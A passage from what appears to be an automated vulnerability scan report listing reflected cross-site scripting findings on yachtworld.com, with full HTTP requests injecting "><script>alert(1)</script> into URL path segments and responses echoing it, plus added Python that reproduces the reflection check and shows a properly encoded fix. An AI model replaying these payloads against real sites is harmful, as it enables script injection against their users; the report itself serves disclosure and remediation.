Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:57 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
el="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmingtone7c2f"><script>alert(1)</script>22176e24a46/NC/United-States&boat_id=2305157">
...[SNIP]...

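The findings in this section all share one sink: a request-path segment (or, in 3.96, the name of an arbitrary query parameter) is concatenated into the back= query parameter of a double-quoted href on the photoGallery.jsp link, with neither URL encoding of the components nor HTML encoding of the attribute value, so the "> at the start of the payload closes the attribute and the <a> tag and the <script> that follows becomes a real element. The Python below is an added example, not code from the CloudScan report or from yachtworld.com: it models that sink with a constructed template (render_vulnerable and render_fixed are assumptions modelled on the response snippets, not the site's JSP), reproduces the canary-prefix/suffix reflection check the scanner performs, parses the result to confirm whether an injected <script> element actually appears, and shows the hardened rendering. The canaries a142d / 12c59d7a8be and boat id 2305173 are taken from the first finding above and used only as sample input.

```python
"""Reflected XSS in a double-quoted href attribute: reproduce the scanner's
reflection check and show the hardened rendering.

Added example; not code from the CloudScan report or from the scanned
application. The markup templates are constructed for the demonstration,
modelled on the photoGallery.jsp link in the report's response snippets.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import quote, urlencode

# The scanner's probe: random prefix, attribute breakout, random suffix.
# The canaries make a verbatim match unambiguous inside a large response.
BREAKOUT = '"><script>alert(1)</script>'


def make_probe(prefix: str, suffix: str) -> str:
    return prefix + BREAKOUT + suffix


def render_vulnerable(path_segment: str, boat_id: str) -> str:
    """Assumed template for the sink seen in the report: the request path is
    concatenated into the back= query parameter of a double-quoted href with
    no URL encoding and no attribute encoding."""
    back = ("/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/"
            + path_segment + "/United-States")
    return ('<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick'
            '&boat_id=' + boat_id + '&back=' + back + '&boat_id=' + boat_id + '">')


def render_fixed(path_segment: str, boat_id: str) -> str:
    """Same markup with the two encodings a URL-inside-an-attribute needs:
    1. percent-encode the untrusted segment as a path component of the inner
       URL, then percent-encode the inner URL as a query value of the outer
       one (urlencode does this; the inner %22 becomes %2522, which the
       receiving handler decodes back exactly once);
    2. HTML-attribute-encode the finished attribute value, so a '"' could not
       close the attribute even if step 1 were skipped."""
    back = ("/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/"
            + quote(path_segment, safe="") + "/United-States")
    query = urlencode([("slim", "quick"), ("boat_id", boat_id),
                       ("back", back), ("boat_id", boat_id)])
    href = "/core/listing/photoGallery.jsp?" + query
    return '<a rel="nofollow" href="' + html.escape(href, quote=True) + '">'


def classify_reflection(body: str, prefix: str, suffix: str) -> str:
    """The check the scanner performs on the response body.
    'verbatim'      : breakout reflected unmodified between the canaries, so
                      the attribute context is breakable (Confidence: Certain)
    'encoded'       : canaries present but '"' / '<' were transformed
    'not-reflected' : canaries absent from the response"""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if m is None:
        return "not-reflected"
    return "verbatim" if m.group(1) == BREAKOUT else "encoded"


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the HTML parser actually recognises."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def injected_script_count(markup: str) -> int:
    """Independent confirmation: does the reflected payload yield a real
    <script> element, or does it stay inert inside the attribute value?"""
    p = _ScriptCounter()
    p.feed(markup)
    p.close()
    return p.scripts


if __name__ == "__main__":
    # Canaries taken from the first payload in this section; sample input only.
    probe = make_probe("a142d", "12c59d7a8be")
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        body = render(probe, "2305173")
        print(name, classify_reflection(body, "a142d", "12c59d7a8be"),
              "script tags:", injected_script_count(body))
```

Run as a script it prints "vulnerable verbatim script tags: 1" and "fixed encoded script tags: 0". The regex check alone is what the scanner uses to grade the finding; the parser pass is the extra step worth doing when triaging, because it separates a payload that really closes the attribute from one that is reflected verbatim somewhere harmless (inside a comment, a textarea, or a JSON string). Note also that the hardened output in render_fixed contains exactly four double-quote characters, the two pairs that delimit rel and href, whatever the input is.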
3.98. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad86"><script>alert(1)</script>1a4dcae2003 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NCfad86"><script>alert(1)</script>1a4dcae2003/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:24 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:23 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
"nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NCfad86"><script>alert(1)</script>1a4dcae2003/United-States&boat_id=2305157">
...[SNIP]...

3.99. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 833dd"><script>alert(1)</script>f4cd42b8d3c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States833dd"><script>alert(1)</script>f4cd42b8d3c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:44 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:44 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%